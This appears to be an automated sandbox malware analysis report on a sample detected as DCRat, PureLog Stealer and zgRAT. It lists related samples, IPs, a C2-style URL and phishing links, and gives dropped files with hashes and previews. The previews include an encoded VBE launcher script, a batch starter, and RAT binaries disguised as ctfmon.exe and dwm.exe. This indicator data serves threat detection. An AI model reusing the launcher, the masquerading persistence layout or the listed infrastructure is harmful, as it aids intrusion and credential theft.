                                        kqq1aAcVUQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 319351cm.nyashteam.ru/Providerto_pollProcessorbigloadprotectSqlWpLocal.php

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUSVegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                        • 172.67.160.84
                                        SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                        • 172.67.160.84
                                        aimware.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 172.67.132.55
                                        https://belasting.online-factuur.comGet hashmaliciousUnknownBrowse
                                        • 172.67.171.151
                                        https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310Get hashmaliciousKnowBe4Browse
                                        • 1.1.1.1
                                        gdi32.dllGet hashmaliciousLummaCBrowse
                                        • 104.21.66.86
                                        Loader.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.157.254
                                        Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.86
                                        setup.msiGet hashmaliciousUnknownBrowse
                                        • 172.67.165.214
                                        !Set-up..exeGet hashmaliciousLummaC StealerBrowse
                                        • 172.67.75.40

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\Desktop\etRRuFlx.logaimware.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              tBnELFfQoe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                Z4D3XAZ2jB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    4t8f8F3uT1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      F3ePjP272h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                            Created / dropped Files

                                                            C:\ComproviderComponentIntocommon\26c12092da979c

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with very long lines (716), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):716
                                                            Entropy (8bit):5.891747425043784
                                                            Encrypted:false
                                                            SSDEEP:12:dQ/5yL6+1zLkIc4oEmdWkIuFx6IGA1ZaIo5OP/0lIW3JH4/x0rMepZ:dQ/5D+hLjcCm1Q+PsVH4Z0YKZ
                                                            MD5:7B75F2F225AC4102B6CAA258662B9701
                                                            SHA1:3183F655B4D53624EF4E792A554EE7CB2DE6EDCF
                                                            SHA-256:EDB2026143986147269AA1CFDD9C74FD27912A00F4F073C92CAEE0BF00B2A26F
                                                            SHA-512:5CF63262A7CA3BFD3BA7A0CFC85F69579F72A06373D242642B33A2BEB000B2D88C4F5F1094E608A4051352A7F035ABD104BE854D7127B4AD324FFED8E4E20DE8
                                                            Malicious:false
                                                            Preview:vHrLt2OBdYtanv3srrUe0W76OXpGLXXXM4AuuVpOS3wP9XXk7faX371YJv6WNH0GBVNtvI8WCFL6js619EJp69dPClk8YSBLCqOoJozygDVyv5zayFXJ8LJB17qJi98tEA42eSrUOUI3opeHwJKS52N1hNwL8pQhFltvA66gXC4nCQWMdiXYzpyMwDVQgfVjElxD6sH0Nn527jyR0jsaS1rZxg87lpA2qUjacTQvbhLLu5ONODa6x5RM3YPZtJOhnDLm9YzhT78uqgo2SvthPDEvDXhDD1BRSnhrtlN0O3m07gfWtXG8arRk8ajm0vdc5qbC97Iqh3TWbOxh1KUquC1lW7tSCl9cZJ4QEcXwPaagY5JumBuqbxs3z0qBNzn6406RThcYwhaTlUMay8qA0SAmbBbNwViZwemh91aFjV34WYReoQNOJnGl0TzSGPma8AhHspa6ikbeZGPCt6jfITQJYBrqCI8Tsd5V1Kw9zRqiLlMtDwiJpGSpuYtq7u4ZmHw6L3LjKkq1ms8xz7mPkzomKQlcaFBFXR6DzQiKl89FabCBa619IoywdJv5RsIEikdVw47iZcomziLtNkCeOB6scJjpen22z4gz7qPf8SkqAM648Crrqo0gnv2mVSEvjvx5BVvgUhg5bQrQMoqc6KMLDALLymJpOyGPYB2nQKWIH5FXEmaqllzZjm2BJjssX0qmJc1LvDLv

                                                            C:\ComproviderComponentIntocommon\274fed6a903feb

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with very long lines (995), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):995
                                                            Entropy (8bit):5.91273221473692
                                                            Encrypted:false
                                                            SSDEEP:24:j38QAFz4ot2jvkxNqtXkkrQojPrQ3TcbXpMyLnw4K6IO:NABtCvkxct0kRrQ3obZM6X
                                                            MD5:F1610AA156D2E5678DC89D279036B05F
                                                            SHA1:273CC062C8E0FEEE415AA1BD41B997D548E4FC53
                                                            SHA-256:429F28575432E1084FBB6F4D22D67CBFABAF769A0EDD23918494CF5756390535
                                                            SHA-512:2FC9A62B085ED58C3C2C3A5C5C8A057F83863B6490CDCC9BF68E24DA628E77BF247098B2A00D0F6F577DB544B46E01135A641975B47020D13E697196476B6B73
                                                            Malicious:false
                                                            Preview:UJHmCRccrIz2sXg4aA7ZxBN2PPH1ummHRzR8iYvsD9nOWaoTyxHV5lMT5PXxJlsFgsk2GiVCOPWyY9fzlxD6eQLqn7CTB8ibQisozvNPcFGqOY56tiLWhwkPg3PIfBBPq4hzR190kxeYKfcOCGkcwM3e7dH5fFtaE1AU1Fp1iVvuSLFBbBGZbiceAC2xtEUeDDUTeIX6as4baJMvYGde9U8gYgTyN1HeBRqO1wgTnJ8toBD10GZnkzftFy48yjtjkaZJd84mjK1zVP1Wcc7Gbe3Mv6JD1heEaZIOl3X2MxDa7qYz6ifWlnIGgNYgz0uCpwZ6HnuiEF3nbdOFiTGSBIdwRCrYf1DVCBuLQcsSx7RfuepD9S8fucAhTmoF6WDNChkZsDyFlyfE07CwWoYN2hlkBM1oxmWa3EdM3PU6e23575rWj2sS80Ue5AYfLJS8cEKvd03HTcs9npnGfeF54DcDu8R31yuUk5d2u52t9l8gHU0PXRArEWDYmGBejAPerYYsMuWklW5TE66ZIBfjyDPN1EQn3XJ9Vdyt5IDm5ZFsauTpKmWheqqoIK0HesqNM67kINd983nY7hxGvlcRBmepxJluR5INt1fewsh7IWikCRrkXtW3PZMjbSx8mssDvapGBSUCDfIoD4mgcAWhjP7Uo6Cd5iUaofzmmkiFZTzuQifhqRglVLdfdUbFQ0HeKsAiE931bRHPZMDGaewoCtEdCTJRJdyiMVjii7dqXoJEDNFQQUowDcbboggu0lr8djDEnfidAGQYj9ayN2BzyBet3I4Bbt0v6LkdKBnvwLv7MD1oGrg7k2KbETLelhCRQebYZ6nMPPDmPhh0QP4tM2LEAJZ00IJPJerrldPKDTsUyhLhwUOVmSFXTXXQgxWHGycvzzPxAtp2K0Pd72Df4xm0ZTYOF8oQ7lOAEar7FaV2nMNcH4Snt1MSLmWgbArBFY5ilPYhLGZdctNMF5HLqAgFY6ycDKfEtTx

                                                            C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):216
                                                            Entropy (8bit):5.755360044405206
                                                            Encrypted:false
                                                            SSDEEP:6:GVwqK+NkLzWbH3WrFnBaORbM5nCiRe495Nl7s:G4MCzWLmhBaORbQCiRZB7s
                                                            MD5:0A78FBB0D4E74B92BB8163F85A68B1C1
                                                            SHA1:0F2A18DD700999F8D2437FDFD51530658BA16C89
                                                            SHA-256:2CB1279B2894F9C82363A474DB31FF99B655D64E17B1C8CFC13FAE1289DD06E9
                                                            SHA-512:9C819F6270B5159171D0D5BBB3DE21D49B355859D3B721EF61EA9F4FE9A4AA4B8152FCFEAF2D7EFBFF575B3A7CF29308DDAAFEEA1E470A555C7CC62D01F3F83B
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:#@~^vwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v 1!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z/K:aDW7k9nD;WhwKxnUDqxDGmK::KU&zOL+Z/k4 (lOJB~!BPWC^/+kT0AAA==^#~@.

                                                            C:\ComproviderComponentIntocommon\9j6CCih.bat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):97
                                                            Entropy (8bit):5.016171512880101
                                                            Encrypted:false
                                                            SSDEEP:3:3MAAfv4yoikmKI9KTMfgTnEKLFgzYACsytIoUA:xAfv1oaT9KjEQqzYACsyLZ
                                                            MD5:B4699F0866C190887AA4B63E7AAF8990
                                                            SHA1:DE39CACA431F192F635C5A0FBE9CD9A45D40F6F3
                                                            SHA-256:767A170872554A812A5445C3437FB450947D2874131E7BD420FC5869021BD554
                                                            SHA-512:6A8B4B90A63C9E88C3999598F804F842F622365BAD96CB239BBAC4D87125ECBD468B5C8340E5476E53BE3DF86C4673414E96C99F202B88A109E1C47B58B26F7D
                                                            Malicious:false
                                                            Preview:%wRY%%tElTuHUIdtvf%..%BlVCCvx%"C:\ComproviderComponentIntocommon/Portsessionsvc.exe"%LCkJQHwzLMq%

                                                            C:\ComproviderComponentIntocommon\Portsessionsvc.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..

                                                            C:\ComproviderComponentIntocommon\ctfmon.exe

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComproviderComponentIntocommon\ctfmon.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComproviderComponentIntocommon\ctfmon.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..

                                                            C:\ProgramData\efd13273fe2d44

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):201
                                                            Entropy (8bit):5.619721378958909
                                                            Encrypted:false
                                                            SSDEEP:3:vcXpJt1Q6mESOh9CfEiXi/o9juflCZ/VOUkI86knSnK/OVoR6GMxRZg/:vcXpJwPOh9jMuNCJV726ty+FS
                                                            MD5:17B17B0FCD3EB0492D5454061175D5A0
                                                            SHA1:0C97A10085B32B62ACBF8DA2E9F302F2A1553222
                                                            SHA-256:4481002657193AA3EFBA27858C45D0C1FEBF7946A0DCD9AF17FFB046E7587D1F
                                                            SHA-512:F278C62AEC68535151204E89100FB33325E543B8D4CCC95D16EA5E202632333669AD19AA06E502D3850468CA08ED9F843242580F136A6F40FA94FD80D941444B
                                                            Malicious:false
                                                            Preview:cDm9rpwJ1drcouQOcNmuP5iaElgitGVcgg5wEncwFB4keTJSw3ckfb6hfM5FJOZuIO5HzeKzuzoNA86vcNvzou6EjXR1rXn0mJbPXBdStmzqwtghQKm6cjGXS0icMSHXLyl1grXbucGB4QR00ulhvrYCDE7gdAGbfce8HpAjwKM9dFcBirlcqjleZiyct08tWofcvTtLt

                                                            C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..

                                                            C:\Recovery\6cb0b6c459d5d3

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with very long lines (574), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):574
                                                            Entropy (8bit):5.880290946093431
                                                            Encrypted:false
                                                            SSDEEP:12:M1JhFvcM0gEB+6X3PJE/ajwSFPcSwYmT03UFOZSAi8kIkv/pl4jms7aEj:qhVcM0gc+6HPJcajwSkSwYmT0EFOZSVu
                                                            MD5:280F80F3841F9C32BC80B9B749AEBB10
                                                            SHA1:93A5D596FE87EF52A5CC1BA4FA32F9C6DB389D49
                                                            SHA-256:AD3D512BFC3B50828CA80FFEFE22094CFE785490ADD8476D6DA67BD50BFE72D8
                                                            SHA-512:7C4BB424391A16D69465DD718CE0CD0A75CDD28F344A913E16B35F9D38A83B6B36DFEA5D8ED484F87501485DF6A5223735007C55D2084BEB2DB670ADE0C9CF08
                                                            Malicious:false
                                                            Preview:7l57vZnu51Ajj1iz5McmyjAPP8asnyB8B901y3MUt3kkuuJTLNzXCvuXkpsx84HGzChkAqAC9I349ZffyGha8n5POcQIKZVywevsMjTeMxY420YKKM81XrHMGSVha21kwFHfowTPxCNLPBXYEG77adaFWim3NvEU5xHws3gX3tEVd57E47dU44KSoCIFKZBB73Qb3kqKkjDqZFlalh9PSuZBmyIpuaNerCXkpfKURStV0e3iasdnZwtNePzEbAZJWj8WrBuGWo89AELI5jPC6jE5SKGapF2R3k8Qfg0Y7XQvxuMaDrJ2uXNxeCEh5UaQwqGaF4mYs0EjSTHi8qW86AgfXKwdcTdn698HowUJEuJ4SoeK4fjP7bUwKkD4HJ6ZWbmSVA4LVM4L0mNsqli6uOpepL6DsZB5yuh0BLz4lX3vhJ5iWUOgk9pIwHnJD0d6K9WGEXrfwoUWV47gQYrYKfUyEZE3hp0v46kiwyd9mst6pSw2KH3pJFvpohBoSx7GyjcZTZub4rvcwXJwnMtawKmyK53OxzqzvmIGzXivXcubTT2QYPBGEgUn6nOYff

                                                            C:\Recovery\dwm.exe

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dwm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dwm.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..

                                                            C:\Recovery\efd13273fe2d44

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with very long lines (521), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):521
                                                            Entropy (8bit):5.893484173965041
                                                            Encrypted:false
                                                            SSDEEP:12:ZLVdWGyvXSRIaVQr0arlec1FOxM4s9MoeGAjzgV10WTg2uoG:0vXSiaA0ih1FO4Hg6SWTg2uoG
                                                            MD5:52AF11A45C53DEE28CAF76B542FA6FD6
                                                            SHA1:3BC2562B51166DA44A994B4487B894267FF3A6BF
                                                            SHA-256:513643EB46D586208DA3E915984166D322DC972F24521335FC497BFEDB233410
                                                            SHA-512:9464BFF29C68AA65B78E3BCEF0BEDFC2F310E0FA563070B4862381E9D2F61487C009B83EFEC9C666DC36FDA221FA08F65E51F7A60B76999454DFEDFC05401AB3
                                                            Malicious:false
                                                            Preview:vcnbtzcYJaf3gVF2zKpa6dAlVuJ686aEPp4h3ooHWD4u9KM7sWaeLbjScCF8pfaN9ao1bh9LfiE2jQlKhLOlf63yFmF0iqb0mrujgUgKXP8mWrsLb5bdRyrDh0wzbImzHNP2gCoNpDOQ7QbX34ZnO7jy9qBqirtOnJfJb0pZRNyOkbFQYY5hs8kJob2zA7p8U9myvR5DOAWBJUNikvRJvLgoiWfA7zYTiz4kyReGd2Srmj9TNUPOqgMId8QYw5GZlDcUZnuTQKp32yC8WLwmkKnCmwHzBGUhv3GiGp3kk58f0SPo6RCkJdybaarng4SK0IH9sd2rRMCoMIMTgc3uDtXSEoIq8QEpnxorLQ5dYUT7aKPSOXHDBiGGvz4EULtBHWAYdeIPgZVsaa14Y0ckIBoFqi6VW1INlRzEJ0ytO2glMXpV79pdtI3Gs5r4ix2pQHGJkxviBsWQeD2S2lYWMpddYtWOI4Lb91UEQguKOHbBvnloCZB7Zfclonv1bgZHg5QnsxBW0

                                                            C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Portsessionsvc.exe.log

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1306
                                                            Entropy (8bit):5.353303787007226
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                            MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                            SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                            SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                            SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ctfmon.exe.log

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\ctfmon.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.354334472896228
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                            Malicious:false
